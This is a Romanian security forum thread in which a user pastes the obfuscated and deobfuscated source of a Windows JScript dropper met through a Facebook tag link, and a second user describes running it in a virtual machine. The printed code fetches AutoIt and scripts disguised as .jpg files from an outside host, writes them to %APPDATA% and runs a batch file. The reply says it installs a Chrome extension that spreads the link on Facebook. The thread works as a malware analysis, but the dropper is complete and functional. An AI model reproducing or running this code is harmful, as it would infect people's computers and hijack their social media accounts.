Church Posted June 26, 2016 Report Posted June 26, 2016 Salut, Astazi am fost tag-uit intr-un comment, in momentul in care dai click pe notificare te redirectioneaza catre link Sursa: var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x
66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3|| !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2= new 
ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix= new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso= new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1= new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this) deobfuscat: /** @type {Array} */ var _0xe519 = ["Msxml2.XMLhttp", "onreadystatechange", "readyState", "status", "ADODB.Stream", "open", "type", "write", "position", "read", "saveToFile", "close", "GET", "send", "Scripting.FileSystemObject", "WScript.Shell", "Shell.Application", "%APPDATA%\\", "ExpandEnvironmentStrings", "Mozila", "https://www.google.com", 
"http://userexperiencestatics.net/ext/Autoit.jpg", "\\autoit.exe", "http://userexperiencestatics.net/ext/bg.jpg", "\\bg.js", "http://userexperiencestatics.net/ext/ekl.jpg", "\\ekl.au3", "http://userexperiencestatics.net/ext/ff.jpg", "\\ff.zip", "http://userexperiencestatics.net/ext/force.jpg", "\\force.au3", "http://userexperiencestatics.net/ext/sabit.jpg", "\\sabit.au3", "http://userexperiencestatics.net/ext/manifest.jpg", "\\manifest.json", "http://userexperiencestatics.net/ext/run.jpg", "\\run.bat", "http://userexperiencestatics.net/ext/up.jpg", "\\up.au3", "http://whos.amung.us/pingjs/?k=pingjse346", "\\ping.js", "http://whos.amung.us/pingjs/?k=pingjse3462", "\\ping2.js", ""]; (function(dataAndEvents) { /** * @param {?} f * @param {?} o * @param {number} mayParseLabeledStatementInstead * @return {?} */ function tryIt(f, o, mayParseLabeledStatementInstead) { if (!o || !f) { return null; } var xhr = WScript.CreateObject(_0xe519[0]); /** * @return {undefined} */ xhr[_0xe519[1]] = function() { if (xhr[_0xe519[2]] === 4 && xhr[_0xe519[3]] === 200) { xa = new ActiveXObject(_0xe519[4]); xa[_0xe519[5]](); /** @type {number} */ xa[_0xe519[6]] = 1; xa[_0xe519[7]](xhr.ResponseBody); /** @type {number} */ xa[_0xe519[8]] = mayParseLabeledStatementInstead; stm2 = new ActiveXObject(_0xe519[4]); /** @type {number} */ stm2[_0xe519[6]] = 1; stm2[_0xe519[5]](); stm2[_0xe519[7]](xa[_0xe519[9]]()); stm2[_0xe519[10]](o, 2); stm2[_0xe519[11]](); xa[_0xe519[11]](); } }; xhr[_0xe519[5]](_0xe519[12], f, false); xhr[_0xe519[13]](null); } /** * @param {?} filename * @param {?} path * @return {undefined} */ function readFile(filename, path) { xa = new ActiveXObject(_0xe519[4]); xa[_0xe519[5]](); /** @type {number} */ xa[_0xe519[6]] = 1; xa.LoadFromFile(filename); ix = new ActiveXObject(_0xe519[4]); ix[_0xe519[5]](); /** @type {number} */ ix[_0xe519[6]] = 1; ix.LoadFromFile(path); stm2 = new ActiveXObject(_0xe519[4]); /** @type {number} */ stm2[_0xe519[6]] = 1; stm2[_0xe519[5]](); 
stm2[_0xe519[7]](ix[_0xe519[9]]()); stm2[_0xe519[7]](xa[_0xe519[9]]()); xa[_0xe519[11]](); ix[_0xe519[11]](); stm2[_0xe519[10]](filename, 2); stm2[_0xe519[11]](); } fso = new ActiveXObject(_0xe519[14]); var fo = new ActiveXObject(_0xe519[15]); dataAndEvents = new ActiveXObject(_0xe519[16]); FileDestr = fo[_0xe519[18]](_0xe519[17]); mozklasor = FileDestr + _0xe519[19]; if (!fso.FolderExists(mozklasor)) { fso.CreateFolder(mozklasor); } dataAndEvents.ShellExecute(_0xe519[20]); tryIt(_0xe519[21], mozklasor + _0xe519[22], 0); tryIt(_0xe519[23], mozklasor + _0xe519[24], 0); tryIt(_0xe519[25], mozklasor + _0xe519[26], 0); tryIt(_0xe519[27], mozklasor + _0xe519[28], 0); tryIt(_0xe519[29], mozklasor + _0xe519[30], 0); tryIt(_0xe519[31], mozklasor + _0xe519[32], 0); tryIt(_0xe519[33], mozklasor + _0xe519[34], 0); tryIt(_0xe519[35], mozklasor + _0xe519[36], 0); tryIt(_0xe519[37], mozklasor + _0xe519[38], 0); tryIt(_0xe519[39], mozklasor + _0xe519[40], 0); tryIt(_0xe519[41], mozklasor + _0xe519[42], 0); dataAndEvents.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0); })(this); Nu imi dau seama ce face, dar pare interesant. Quote
Active Members dancezar Posted June 26, 2016 Active Members Report Posted June 26, 2016 (edited) L-am instalat pe o masina virtuala :))) Pare sa fie targetat pentru Chrome. Baga in %appdata% un folder Mozila, in care sunt niste script-uri autoit impreuna cu compilatorul autoit. Iti instaleaza o extensie in chrome folosita sa trimita si la alte persoane acel link; acesta e script-ul folosit pe facebook: http://pastebin.com/9UDBCg0c Script-ul extensiei chrome: http://pastebin.com/mF0LtMZK Daca te duci pe chrome://extensions o sa te redirectioneze :))) In final nu stiu care este scopul lui si de ce se raspandeste. https://www.sendspace.com/file/88v34k http://appcdn.co/data.js?r Daca intri de pe chrome o sa te redirectioneze catre diferite domenii unde e tinut script-ul pentru facebook, daca intri de pe firefox o sa iti dea jquery. Edited June 26, 2016 by danyweb09 Quote